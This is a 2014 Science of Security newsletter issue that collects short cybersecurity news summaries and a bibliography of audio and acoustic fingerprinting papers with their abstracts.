Science of Security (SoS) Newsletter (2014 - Issue 2)

SoS Newsletter Banner

2014 - Issue #02


General Topics of Interest:


General Topics of Interest include news items related to Cybersecurity, information on academic SoS research, interdisciplinary SoS research, brief profiles of leaders in the field of SoS research, and descriptions of entities outside the United States involved in related research.

Publications:

The Publications of Interest section contains bibliographical citations, including abstracts (if available) and links on specific topics and research problems of interest to the Science of Security community. Please check back regularly for new information.

Table of Contents

(ID#:14-2009)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


In the News (2014-02)

In the News


  • "Facebook disrupts cryptocurrency-mining bonnet Lecpetex", SC Magazine, 09 July 2014. Facebook teamed up with law enforcement to disrupt the crypto-currency mining botnet "Lecpetex". The botnet had used Facebook spam messages to deliver malicious files to the victim's computer, which used the victim's computer to mine cryptocurrency and the victim's account to further propagate the malware via spam. (ID#: 14-50000) See http://www.scmagazine.com/facebook-disrupts-cryptocurrency-mining-botnet-lecpetex/article/360154/
  • "McAfee Plots Security Framework for Internet of Things", Infosecurity Magazine, 09 July 2014. McAfee has joined the Open Interconnect Consortium -- a project to "define and deliver device-to-device connectivity requirements for the internet of things (IoT)" -- to help improve security standards for the IoT. The sheer number and variety of devices to be on the IoT makes it a prime security risk. (ID#: 14-50009) See http://www.infosecurity-magazine.com/view/39236/mcafee-plots-security-framework-for-internet-of-things/
  • "IEEE Launches Two Anti-malware Services", Infosecurity Magazine, 09 July 2014. IEEE has launched two of its own anti-malware services as part of a new Anti-Malware Support Service (AMSS) project to "provide a place for collaboration on new technologies and standards-related offerings." Additional services are planned to be released in the future. (ID#: 14-50010) See http://www.infosecurity-magazine.com/view/39214/ieee-launches-two-antimalware-services/
  • "Microsoft Error Plunged Np-IP Punters Into Darkness", Infosecurity Magazine, 03 July 2014. Despite warnings from the cybersecuriy community about abuse of No-IP services for malicious purposes, Microsoft has been criticized for lack of response to the issue. In a recent attempt to snuff out a botnet, Microsoft's Digital Crimes Unit (DCU) ended up blocking No-IP services from legitimate users. (ID#: 14-50011) See http://www.infosecurity-magazine.com/view/39149/microsoft-error-plunged-noip-punters-into-darkness/
  • "CyberRX preps health care community for cyberattack", GCN, 01 July 2014. The Department of Health and Human Services and Health Information Trust Alliance (HITRUST) teamed up with ten private sector organizations to test the ability of healthcare providers to respond to and prevent cyber attack. The real-life nature of the exercises are invaluable for determining the state of healthcare security. (ID#: 14-50015) See http://gcn.com/articles/2014/07/01/cyberrx.aspx?admgarea=TC_SecCybersSec
  • "Isolate and conquer: Getting past a reliance of layered security", FCW, 09 July 2014. Most organizations rely on costly layers of protective measures to defend against cyber attack, but vulnerabilities deep within devices -- such as an operating system kernel -- can be used to simultaneously defeat these stacks of layered security. Over 80 Windows kernel vulnerabilities were discovered in 2013 alone. (ID#: 14-50016) See http://fcw.com/articles/2014/07/09/crosby--micro-virtualization.aspx
  • "DOT CIO on cyber, shared services and 'technology that is changing constantly'", FCW, 08 July 2014. Interview with DOT CIO R. McKinney. In his first year as the DOT CIO, Richard McKinney has adopted a strong focus on cybersecurity, recognizing it as an integral part of keeping America's infrastructure safe. (ID#: 14-50017) See http://fcw.com/articles/2014/07/08/dot-mckinney-qanda.aspx
  • "NIST goes global with cyber framework", FCW, 03 July 2014. In the interest of promoting international dialogue on cybersecurity, the NIST has been taking its new cyber framework, which is between critical infrastructure firms and government, overseas. The focus is not on showing off the framework itself, but the process by which it was developed, in the hopes that other nations can learn from it and produce their own versions. (ID#: 14-50018) See http://fcw.com/articles/2014/07/03/nist-global-cyber-framework.aspx
  • "Teaming up to train, recruit cyber specialists", FCW, 18 July 2014. Lawrence Livermore National Laboratory announced that it will be joining up with Betchel BNI and Los Alamos National Laboratory in their effort to train a new generation of cyber defense professionals to protect critical infrastructure. The program will prepare trainees to guard against cyber threats in government and private sector environments. (ID#: 14-50021) See http://fcw.com/articles/2014/07/18/national-labs-cyber-training.aspx
  • "Treasury Secretary warns of cyber threat to financial sector", FCW, 16 July 2014. In a recent speech in New York City, Treasury Secretary Jacob Lew highlighted the seriousness of the cyber risk to the financial sector. According to Lew, cyber crime "undercuts America's businesses and undermines U.S. competitiveness" and can "pose a threat to financial stability". (ID#: 14-50022) See http://fcw.com/articles/2014/07/16/treasury-warning-on-cyber.aspx
  • "Data breach epidemic shines spotlight on shared secrets", GCN, 17 July 2014. No matter how good security measures may be, passwords are merely shared secrets that rely on both the end user and authenticating party. Human error and hardware/software vulnerabilities are always possible and can compromise even the most secure systems. Data breaches that reveal user's passwords have become a serious issue. (ID#: 14-50030) See http://gcn.com/articles/2014/07/17/isc2-shared-secrets-security.aspx?admgarea=TC_SecCybersSec
  • "New proactive approach unveiled to detect malicious software in networked computers and data", Virginia Tech News, 04 June 2014. Researchers at Virginia Tech have announced new research that helped develop use of causal relations and semantic reasoning to detect illegitimate network activities. This new method is proactive, as opposed to reactive, making it a powerful tool for preventing malware. (ID#:14-1893) See http://www.vtnews.vt.edu/articles/2014/06/060414-engineering-malware.html
  • "Computer scientists develop tool to make the Internet of Things safer", UCSD Jacobs School of Engineering, 02 June 2014. Computer Scientists at UCSD developed a tool to test the security of hardware, based on Gate-level Information Flow Tracking (GLIFT) technology. This will help the "Internet of Things" -- a proposed network of smart devices such as cars, cell phones and medical devices -- stay secure. (ID#:14-1894) See http://www.jacobsschool.ucsd.edu/news/news_releases/release.sfe?id=152
  • "Navy puzzle challenge blends social media, cryptography", GCN, 02 June 2014. The winners of the Navy's "Project Architeuthis", a cryptography puzzle game, were announced. Players had to solve "complex, story-like" puzzles based on clues posted to Facebook. By interacting with "people who enjoy complicated, story base puzzle solving", the Navy hopes to attract the interest of bright minds into their Information Dominance Corps. (ID#:14-1895) See http://gcn.com/articles/2014/06/02/project-architeuthis.aspx
  • "Automating Cybersecurity", The New York Times, 04 June 2014. A competition held by DARPA is offering a $2-million prize to a programming team that is able to build software to automatically detect intruders, detect the security flaws that allow breaches, and fix those flaws automatically. The challenge is excepted to bring together hackers and academics to help automate cyber defense. (ID#:14-1897) See http://cacm.acm.org/news/175515-automating-cybersecurity/fulltext
  • "Exclusive: U.S. companies seek cyber experts for top jobs, board seats", Reuters, 30 May 2014. Following an increase in high-profile security breaches, many large U.S. companies are seeking to increase the strength of their cyber defenses by hiring more cyber experts. Demand for chief information security officers (CISOs) and other security experts is increasing; those positions are being elevated in management hierarchies. (ID#:14-1899)See http://www.reuters.com/article/2014/05/30/us-usa-companies-cybersecurity-exclusive-idUSKBN0EA0BX20140530
  • "Quantum Cryptography with ordinary equipment", IEEE Spectrum, 30 May 2014. Japanese researchers revealed a unique approach to quantum cryptography which incorporates phase shifting of optical signals in fiber-optic cable to transmit cipher keys. This easy-to-implement method does not require the same transmission measurements that are used by conventional quantum systems to detect key tampering. (ID#:14-1900) See http://cacm.acm.org/news/175390-quantum-cryptography-with-ordinary-equipment/fulltext
  • "Test to leverage cloud expansion", Evaluation Engineering, June 2014. Cisco Systems recently announced plans to, with its partners, invest over $1 billion toward expanding cloud technology to create an "intercloud", or network of clouds. Cloud computing and the "Internet of Everything" has been growing steadily in recent years and is excepted to provide an $19 trillion economic opportunity in the next decade, according to Cisco. (ID#:14-1906) See http://www.evaluationengineering.com/articles/201406/test-to-leverage-cloud-expansion.php
  • "16-Year-Old OpenSSL Bug Detected", PC Magazine, 06 June 2014. A recently-discovered flaw, which took took 16 years to find due to insufficient code reviews, can be exploited to "eavesdrop and make falsifications on your communication when both a server and a client are vulnerable." OpenSSL server versions1.0.1h, 1.0.0m, and 0.9.8.za are unaffected. (ID#:14-1907) See http://www.pcmag.com/article2/0,2817,2459073,00.asp
  • "Mozilla pushes internet security reform through study", SC Magazine, 06 June 2014. Mozilla is awaiting the results of the Cyber Security Delphi research and recommendation initiative's effort to create a "concrete agenda" to help address threats to online security. Mozilla has already put together its own advisory board with experts from prestigious universities and the ACLU. (ID#:14-1915) See http://www.scmagazine.com/mozilla-pushes-internet-security-reform-through-study/article/351445/
  • "Cybersecurity a top priority in Senate appropriations bill", FCW, 09 June 2014. A 2015 Senate appropriations bill is giving cybersecurity provisions high priority. The bill will provide more funding to entities like the FBI's National Cyber Investigate Task Force, the NIST's planned national Cybersecurity Center of Excellence, and others. (ID#:14-1918) See http://fcw.com/articles/2014/06/09/cybersecurity-in-senate-cjs-bill.aspx
  • "China making steady gains in cyber, military IT", FCW, 06 June 2014. On June 5th the Pentagon charged China with stealing U.S. intellectual property, amid rising tensions between China and the U.S. over Information Security and cyber-espionage. (ID#:14-1919) See http://fcw.com/articles/2014/06/06/china-cyber-report.aspx
  • "NIST updates monitoring authorization process", FCW, 06 June 2014. The NIST sent out new guidance to federal agencies, proposing an information system continuous monitoring (ISCM) program to help make information system security authorization more secure. (ID#:14-1920) See http://fcw.com/articles/2014/06/06/nist-cdm-guidelines.aspx
  • "White House looking to Capitol Hill on cyber", FCW, 05 June 2014. Though the executive branch has passed several executive orders to help bolster U.S. cybersecurity, the White House is looking to Congress to act on one of the few bipartisan issues left, namely, cybersecurity. With recent shortcomings in action by the Senate on cybersecurity due to a all-in-one approach to cyber issues, a "piecemeal" approach might be required to yield results. (ID#:14-1921) See http://fcw.com/articles/2014/06/05/cybersecurity-legislation.aspx
  • "IEEE CEO Loeb Named ISACA CEO", Infosecurity Magazine, 06 June 2014. Matthew Loeb, a former IEEE CEO, will assume his role as the new CEO of Information Systems Audit and Control Association (ISACA) on Nov. 1st. Leob plans to increase ISACA's cybersecurity capabilities and raise awareness of the need for cybersecurity in businesses. (ID#:14-1925) See http://www.infosecurity-magazine.com/view/38748/ieee-ceo-loeb-named-isaca-ceo/
  • "Databases of personnel at US command In S Korea hacked", Cyber Defense Magazine, 09 June 2014. A cyber attack on United States intelligence has led to a data breach that compromised the personal information of around 16,000 American-employed workers and former workers in South Korea. The stolen details about U.S. activities in the area could be used for malicious purposes. (ID#:14-1928) See http://www.cyberdefensemagazine.com/databases-of-personnel-at-us-command-in-s-korea-hacked/
  • "Guarding against 'Carmageddon' cyberattacks", Vanderbilt News, 11 June 2014. As automated "smart transportation systems" -- a network of sensors, computers, and signals -- provide increasing potential for safer and more efficient transportation, the risk of those systems becoming victim to cyber attacks increases. Developing the ability to deter, detect, and respond to these attacks is a top priority for academic and government researchers. (ID#:14-1936) See http://news.vanderbilt.edu/2014/06/carmageddon-cyberattacks/
  • "Making a covert channel on the Internet", Cornell Chronicle, 03 June 2014. Researchers have discovered a new way to transmit data covertly over the internet through a method named "Chupja". In this technique, Binary data is represented by modulating the duration of idle characters in between packets of data by mere picoseconds, which is makes detection by monitoring software difficult. (ID#:14-1937) See http://www.news.cornell.edu/stories/2014/06/making-covert-channel-internet
  • "TSA looks to cloud providers for disaster recovery", FCW, 11 June 2014. The TSA is asking for advice from cloud service providers on how they can help back up the TSA's Technology Infrastructure Modernization (TIM) division in the case of emergencies. The TIM helps the TSA communicate with other homeland security-related entities to help recover from disasters. (ID#:14-1938) See http://fcw.com/articles/2014/06/11/tsa-cloud-rfi.aspx
  • "The Internet of government things", FCW, 11 June 2014. As the government is recognizing the capability of the Internet of Things (IoT) to provide social-economic benefits, organizations like the GSA and NIST are promoting development of IoT systems through programs like the SmartAmerica Challenge. The cyber-physical systems that the IoT is comprised of show promise for improving numerous facets of life, including transportation, security, and healthcare. (ID#:14-1939) See http://fcw.com/articles/2014/06/11/internet-of-things-expo.aspx
  • "Cyber Currencies Get Boost from High-Profile Endorsements", 06 June 2014. Bitcoin, despite facing serious trouble in early 2014, is having better luck as big names like TV provider Dish Network and rapper 50 Cent are set to start accepting the cyber currency. More importantly, the Apple Store, which has avoided any involvement with digital currencies in the past, is now preparing to allow iOS developers to support certain cyber currencies. (ID#:14-1940) See http://www.scientificamerican.com/podcast/episode/cyber-currencies-get-boost-from-high-profile-endorsements1/
  • "ICS_CERT: Federal Highway Signs Are Easily Hackable", Infosecurity Magazine, 11 June 2014. In the wake of numerous pranks on digital highway signs, the ICS-CERT is recommending mitigating their notorious lack of security through VPN's and better password management. The signs, upon which commuters rely for information, are important for the safety and efficiency of highways. (ID#:14-1948) See http://www.infosecurity-magazine.com/view/38794/icscert-federal-highway-signs-are-easily-hackable/
  • "Still (Heart)bleeding: New OpenSSl MiTM Vulnerability Surfaces", Infosecurity Magazine, 10 June 2014. Because of the constant scrutiny of the open-source OpenSSL code, new security flaws are constantly being unearthed and patched. For some, this system of disclosure and repair is evidence that the open-source collaboration model works, though others will point to the endless trickle of vulnerabilities as an indication that the code might never be perfected. (ID#:14-1951) See http://www.infosecurity-magazine.com/view/38727/still-heartbleeding-new-openssl-mitm-vulnerability-surfaces/
  • "Last call for comments on Keccak encryption", GCN, 13 June 2014. Before implementing its new Keccak family of hashing algorithms to improve from the long-lived SHA-2 federal standard, the NIST is giving the public a three-month period to voice their thoughts. This will allowing concerns about patent infringement and other issues to be brought up. (ID#:14-1953) See http://gcn.com/blogs/cybereye/2014/06/keccak-comments.aspx?admgarea=TC_SecCybersSec
  • "House Intel chairman upbeat on cyber legislation", FCW, 12 June 2014. Following the success of the House of Representatives' cybersecurity bill, the Senate is expected to pass its own information-sharing bill this year. The success of cyber legislation in the recent past is credited to cyber officials who have educated lawmakers on the importance of cybersecurity issues. (ID#:14-1954) See http://fcw.com/articles/2014/06/12/intelligence-chairman-optimistic-on-cyber.aspx
  • "GCHQ Set to Share Threat Intelligence With CNI Firms", Infosecurity Magazine, 17 June 2014. The UK spy agency GCHQ is slated to start sharing intelligence with government CSPs and eventually CNI firms, which is intended to help protect the UK's cyber infrastructure. This move is seen as a result of the new CISP (Cyber Security Information Sharing Partnership) that was launched last year. (ID#:14-1955) See http://www.infosecurity-magazine.com/view/38896/gchq-set-to-share-threat-intelligence-with-cni-firms/
  • "IBM CISO: Company boards need big picture threat data", SC Magazine, 17 June 2014. According to IBM's CISO Joanne Martin, top-level employees and boards of directors need to be better informed on the details and context of information security to be able to better respond to cyber security issues. It is the responsibility of IT professionals, said Martin, to educate these business leaders. (ID#:14-1959) Seehttp://www.scmagazine.com/ibm-ciso-company-boards-need-big-picture-threat-data/article/356265/
  • "Agencies work to close mobile security, connectivity gaps", GCN, 16 June 2014. Though many workers like to bring their own mobile phones to work, doing so can create a security risk if proper security measures are not in place. New technologies are being researched to create a safer environment for mobile devices and mobile networks in the workplace. (ID#:14-1967) See http://gcn.com/articles/2014/06/16/byod-connectivity.aspx?admgarea=TC_SecCybersSec\
  • "DDoS Attack Puts Code Spaces Out of Business", PC Magazine, 19 June 2014. Code hosting service Code Space was forced to shut down after a DDoS attack and unauthorized access to Code Spaces's Amazon EC2 control panel caused the company to lose most of its data and backups. With the cost of recovery estimated to be too great, Code Spaces stated that they "will not be able to operate beyond this point". (ID#:14-1968) See http://www.pcmag.com/article2/0,2817,2459765,00.asp
  • "Ancestry.com Hit by 3-Day DDoS Attack", PC Magazine, 19 June 2014. After being forced offline by a three-day long DDoS attack, Ancestry.com is back up and running. According to Ancestry.com's CTO Scott Sorensen, no costumer data was stolen by the attackers. (ID#:14-1969) See http://www.pcmag.com/article2/0,2817,2459760,00.asp
  • "Tools to tighten the Internet of Things", GCN, 20 June 2014. The Internet of Things promises to be a reliable way for technology to increase the productivity, connectivity, and well-being of society, but as the IoT grows, so do concerns over its security. It will be the job of the security industry, both civilian and government, to develop software and other methods for keeping it secure. (ID#:14-1970 ) See http://gcn.com/blogs/cybereye/2014/06/internet-of-things.aspx?admgarea=TC_SecCybersSec
  • "New NIST guidance planned as part of federal info policy", FCW, 12 June 2014. In order to standardize the management of information that is deemed sensitive, but not yet classified, the National Archives and Records Administration (NARA) and the NIST are taking steps towards normalizing handling of controlled unclassified information (CUI). (ID#:14-1971) See http://fcw.com/articles/2014/06/12/nist-guidance-as-federal-policy.aspx?admgarea=TC_Policy
  • "Governments Bear the Brunt as Targeted Attacks Rise", Infosecurity Magazine, 23 june 2014. A report by Russian Internet security firm Kaspersky indicates that targeted attacks are on the rise, with 12% of organizations experiencing at least one attack in 2013, up from 9% in previous years; government and defense organizations specifically saw an even higher rate of 18 percent. (ID#:14-1973) See http://www.infosecurity-magazine.com/view/38978/governments-bear-the-brunt-as-targeted-attacks-rise/
  • "FBI, NYPD, and MTA Team on Cybersecurity Task Force", Infosecurity Magazine, 20 June 2014. The FBI, NYPD, and MTA are pooling their resources and capabilities in the new Financial Cyber Crimes Task Force, a joint effort to fight cyber attacks. The collaboration is based on a model that has been used successfully in the past for fighting terrorism and bank robbery, according to FBI assistant director George Venizelos. (ID#:14-1976) See http://www.infosecurity-magazine.com/view/38968/fbi-nypd-and-mta-team-on-cybersecurity-task-force/
  • "Talk stresses IoT concerns as today's problems", SC Magazine, 19 June 2014. The number of devices on the internet, which surpassed the number of humans on the planet in 2008 and is expected to reach 50 billion by 2020, is cause for concern from a cybersecurity standpoint. To protect this network of devices, including those on the upcoming IoT, new technologies like IPv6 will have to be implemented. (ID#:14-1980) See http://www.scmagazine.com/talk-stresses-iot-concerns-as-todays-problems/article/356777/
  • "SAIC looks to make cyber services easier to buy", FCW, 23 June 2014. The SAIC is rolling out with a new program to streamline the process of purchasing security services for government customers, which will allow government entities on tight budgets to purchase these services without the complicated, drawn-out process that they often must endure. (ID#:14-1987) See http://fcw.com/articles/2014/06/23/saic-cyber-services.aspx
  • "Police turning to mobile malware for monitoring", Computerworld, 25 June 2014. Italian company Hacking Team is one of a few groups that makes malware for governments and law enforcement to intercept data and track internet users. The falling cost of these tools means that they can become more widespread, and may be used by the governments of developing nations to violate their citizens' rights. (ID#:14-1989) See http://www.computerworld.com/s/article/9249352/Police_turning_to_mobile_malware_for_monitoring
  • "Can telework improve cybersecurity?", GCN, 27 June 2014. At a time when cybersecurity professionals are needed most by the government, studies find that there is a potentially dangerous shortage. With cybersecurity experts generally making more money in the private sector, the government will have to make the jobs it offers appealing, and offering teleworking could be a crucial part of that effort. (ID#:14-1991) See http://gcn.com/blogs/cybereye/2014/06/telework.aspx?admgarea=TC_SecCybersSec
  • "NSA's Rogers: JIE crucial to cyber defense", FCW, 24 June 2014. NSA director Michael Rogers expresses his eagerness for the DoD's move towards a Joint Information Environment (JIE), which is set to replace the current network structure. According to Rogers, the old "service-centric approach to networks" has been costly to the DoD. (ID#:14-1993) See http://fcw.com/articles/2014/06/24/nsa-rogers-speech.aspx
  • "Four to six teams expected to bid on Defense health record effort", FCW, 25 June 2014. Several teams are expected to compete for a DoD contract to provide a "commercial, off-the-shelf electronic records product" for the military. The project, which will cost around $11 billion, will improve integrate military health services. (ID#:14-1994) See http://fcw.com/articles/2014/06/25/defense-health-record-effort.aspx
  • "DHS plans for cybersecurity in interconnected world", FCW, 27 June 2014. The Department of Homeland Security, which has just released its new Quadrennial Homeland Security Review (QHSR), is expressing increasing concern over the security of interconnected devices. This growing vulnerability of these devices is part of the dramatic change in cybersecurity threats that has occurred since the DHS last published a QHSR. (ID#: 14-1994b) See http://fcw.com/articles/2014/06/27/dhs-qhsr.aspx
  • "Next Generation Internet Will Arrive Without Fanfare, Says UMass Amherst Network Architect", University of Massachusetts Amherst, 24 June 2014. According to a UMass researcher, the next-generation internet -- one with "far better security, greater mobility and many other improved features" -- is not far away, but the transition will be gradual, seamless, and not noticeable to most internet users. (ID#:14-1995) See http://www.umass.edu/newsoffice/article/next-generation-internet-will-arrive
  • "Cracks emerge in the cloud", A*STAR Research, 18 June 2014. A Singapore-based research team has found numerous vulnerabilities in cloud service providers Dropbox, Google Drive, and Microsoft SkyDrive. Insecure URL storage, URL shortening, and other practices can leave a user's private data vulnerable. (ID#:14-1996) See http://www.research.a-star.edu.sg/research/6983
  • "Long distance Glasshole Snoopers Can Spot User PINs", Infosecurity Magazine, 27 June 2014. Researchers at the University of Massachusetts, Lowell have created software that uses mobile camera devices -- such as the new Google Glass -- to detect pass codes as they are being typed. Though watching people type is nothing new, this kind of software could allow criminals to far exceed the capabilities of the human eye. (ID#:14-1999) See http://www.infosecurity-magazine.com/view/39052/long-distance-glasshole-snoopers-can-spot-user-pins/
  • "Cisco Open-sources Experimental Cipher", 24 June 2014. Though traditional block ciphers work very well on large blocks of data (128, 192, 256-bit), use of these encryption tools on smaller objects can lead to an enormous inflation of the size of the data. Cisco is working on a new encryption scheme to more efficiently manage these smaller objects. (ID#:14-2004) See http://www.infosecurity-magazine.com/view/38983/cisco-opensources-experimental-cipher/

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Publications of Interest

Publications of Interest


The Publications of Interest section contains bibliographical citations, abstracts if available and links on specific topics and research problems of interest to the Science of Security community.

These bibliographies include recent scholarly research on topics which have been presented or published within the past year. The specific topics are selected from materials that have been peer reviewed and presented at SoS conferences or referenced in current work. The topics are also chosen for their usefulness for current researchers. Some represent updates from work presented in previous years, others are new topics.

Researchers willing to share their work are welcome to submit a citation, abstract, and URL for consideration and posting, and to identify additional topics of interest to the community. Researchers are also encouraged to share this request with their colleagues and collaborators.

Send submissions to: research (at) SecureDataBank.net

(ID#:14-2010)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Acoustic Fingerprints

Acoustic Fingerprints


Acoustic fingerprints can be used to identify an audio sample or quickly locate similar items in an audio database. As a security tool, fingerprints offer a modality of biometric identification of a user. Current research is exploring various aspects and applications, including the use of these fingerprints for mobile device security, antiforensics, use of image processing techniques, and client side embedding.

  • Liu, Yuxi; Hatzinakos, Dimitrios, "Human Acoustic Fingerprints: A Novel Biometric Modality For Mobile Security," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.3784,3788, 4-9 May 2014. (ID#:14-1601) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6854309&isnumber=6853544 Recently, the demand for more robust protection against unauthorized use of mobile devices has been rapidly growing. This paper presents a novel biometric modality Transient Evoked Otoacoustic Emission (TEOAE) for mobile security. Prior works have investigated TEOAE for biometrics in a setting where an individual is to be identified among a pre-enrolled identity gallery. However, this limits the applicability to mobile environment, where attacks in most cases are from imposters unknown to the system before. Therefore, we employ an unsupervised learning approach based on Autoencoder Neural Network to tackle such blind recognition problem. The learning model is trained upon a generic dataset and used to verify an individual in a random population. We also introduce the framework of mobile biometric system considering practical application. Experiments show the merits of the proposed method and system performance is further evaluated by cross-validation with an average EER 2.41% achieved. Keywords: Autoencoder Neural Network; Biometric Verification; Mobile Security; Otoacoustic Emission; Time-frequency Analysis
  • Zeng, Hui; Qin, Tengfei; Kang, Xiangui; Liu, Li, "Countering Anti-Forensics Of Median Filtering," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.2704,2708, 4-9 May 2014. (ID#:14-1602) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6854091&isnumber=6853544 The statistical fingerprints left by median filtering can be a valuable clue for image forensics. However, these fingerprints may be maliciously erased by a forger. Recently, a tricky anti-forensic method has been proposed to remove median filtering traces by restoring images' pixel difference distribution. In this paper, we analyze the traces of this anti-forensic technique and propose a novel counter method. The experimental results show that our method could reveal this anti-forensics effectively at low computation load. According to our best knowledge, it's the first work on countering anti-forensics of median filtering. Keywords: Image forensics; anti-forensic; median filtering; pixel difference
  • Rafii, Zafar; Coover, Bob; Han, Jinyu, "An Audio Fingerprinting System For Live Version Identification Using Image Processing Techniques," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.644,648, 4-9 May 2014. (ID#:14-1603) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6853675&isnumber=6853544 Suppose that you are at a music festival checking on an artist, and you would like to quickly know about the song that is being played (e.g., title, lyrics, album, etc.). If you have a smartphone, you could record a sample of the live performance and compare it against a database of existing recordings from the artist. Services such as Shazam or SoundHound will not work here, as this is not the typical framework for audio fingerprinting or query-by-humming systems, as a live performance is neither identical to its studio version (e.g., variations in instrumentation, key, tempo, etc.) nor it is a hummed or sung melody. We propose an audio fingerprinting system that can deal with live version identification by using image processing techniques. Compact fingerprints are derived using a log-frequency spectrogram and an adaptive thresholding method, and template matching is performed using the Hamming similarity and the Hough Transform. Keywords: adaptive thresholding; Constant Q Transform; audio fingerprinting; cover identification
  • Naini, Rohit; Moulin, Pierre, "Fingerprint Information Maximization For Content Identification," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.3809,3813, 4-9 May 2014. (ID#:14-1604) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6854314&isnumber=6853544 This paper presents a novel design of content fingerprints based on maximization of the mutual information across the distortion channel. We use the information bottleneck method to optimize the filters and quantizers that generate these fingerprints. A greedy optimization scheme is used to select filters from a dictionary and allocate fingerprint bits. We test the performance of this method for audio fingerprinting and show substantial improvements over existing learning based fingerprints. Keywords: Audio fingerprinting; Content Identification; Information bottleneck; Information maximization
  • Bianchi, Tiziano; Piva, Alessandro, "TTP-free Asymmetric Fingerprinting Protocol Based On Client Side Embedding," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.3987,3991, 4-9 May 2014. (ID#:14-1605) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6854350&isnumber=6853544 In this paper, we propose a scheme to employ an asymmetric fingerprinting protocol within a client-side embedding distribution framework. The scheme is based on a novel client-side embedding technique that is able to transmit a binary fingerprint. This enables secure distribution of personalized decryption keys containing the Buyer's fingerprint by means of existing asymmetric protocols, without using a trusted third party. Simulation results show that the fingerprint can be reliably recovered by using non-blind decoding, and it is robust with respect to common attacks. The proposed scheme can be a valid solution to both customer's rights and scalability issues in multimedia content distribution. Keywords: Buyer-Seller watermarking protocol; Client-side embedding; Fingerprinting; secure watermark embedding
  • Coover, Bob; Han, Jinyu, "A Power Mask Based Audio Fingerprint," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.1394,1398, 4-9 May 2014. (ID#:14-1606) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6853826&isnumber=6853544 The Philips audio fingerprint[1] has been used for years, but its robustness against external noise has not been studied accurately. This paper shows the Philips fingerprint is noise resistant, and is capable of recognizing music that is corrupted by noise at a 4 to 7 dB signal to noise ratio. In addition, the drawbacks of the Philips fingerprint are addressed by utilizing a "Power Mask" in conjunction with the Philips fingerprint during the matching process. This Power Mask is a weight matrix given to the fingerprint bits, which allows mismatched bits to be penalized according to their relevance in the fingerprint. The effectiveness of the proposed fingerprint was evaluated by experiments using a database of 1030 songs and 1184 query files that were heavily corrupted by two types of noise at varying levels. Our experiments show the proposed method has significantly improved the noise resistance of the standard Philips fingerprint. Keywords: Audio Fingerprint; Music Recognition
  • Moussallam, Manuel; Daudet, Laurent, "A general framework for dictionary based audio fingerprinting," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.3077,3081, 4-9 May 2014. (ID#:14-1607) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6854166&isnumber=6853544 Fingerprint-based Audio recognition system must address concurrent objectives. Indeed, fingerprints must be both robust to distortions and discriminative while their dimension must remain to allow fast comparison. This paper proposes to restate these objectives as a penalized sparse representation problem. On top of this dictionary-based approach, we propose a structured sparsity model in the form of a probabilistic distribution for the sparse support. A practical suboptimal greedy algorithm is then presented and evaluated on robustness and recognition tasks. We show that some existing methods can be seen as particular cases of this algorithm and that the general framework allows to reach other points of a Pareto-like continuum. Keywords: Audio Fingerprinting; Sparse Representation
  • Wen-Long Chin, Trong Nghia Le, Chun-Lin Tseng, Wei-Che Kao, Chun-Shen Tsai, Chun-Wei Kao, "Cooperative Detection Of Primary User Emulation Attacks Based On Channel-Tap Power In Mobile Cognitive Radio Networks," International Journal of Ad Hoc and Ubiquitous Computing, Volume 15 Issue 4, May 2014, Pages 263-274. (ID#:14-1608) URL: http://dl.acm.org/citation.cfm?id=2629824.2629828&coll=DL&dl=GUIDE&CFID=514607536&CFTOKEN=40141344 This paper discusses a novel approach to determine primary user emulation attacks (PUEA) in mobile cognitive radio (CR) networks. This method focuses on identifying such attacks when there is a low signal-to-noise ratio (SNR) on the network. Users are directly detected through the physical layer (PHY), using channel-tap power as an identifying radio-frequency (RF) fingerprint. Fixed sample size test (FSST) and Sequential probability ratio test (SPRT) are employed to combat the issue of effective performance in fading channels. Results are discussed. Keywords: (not provided)

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Agents

Agents



In computer science, a software agent is a computer program that acts on behalf of a user or other program. Specific types of agents include intelligent agents, autonomous agents, distributed agents, multi-agent systems and mobile agents. Because of the variety of agents and the privileges agents have to represent the user or program, they are of significant cybersecurity community research interest.

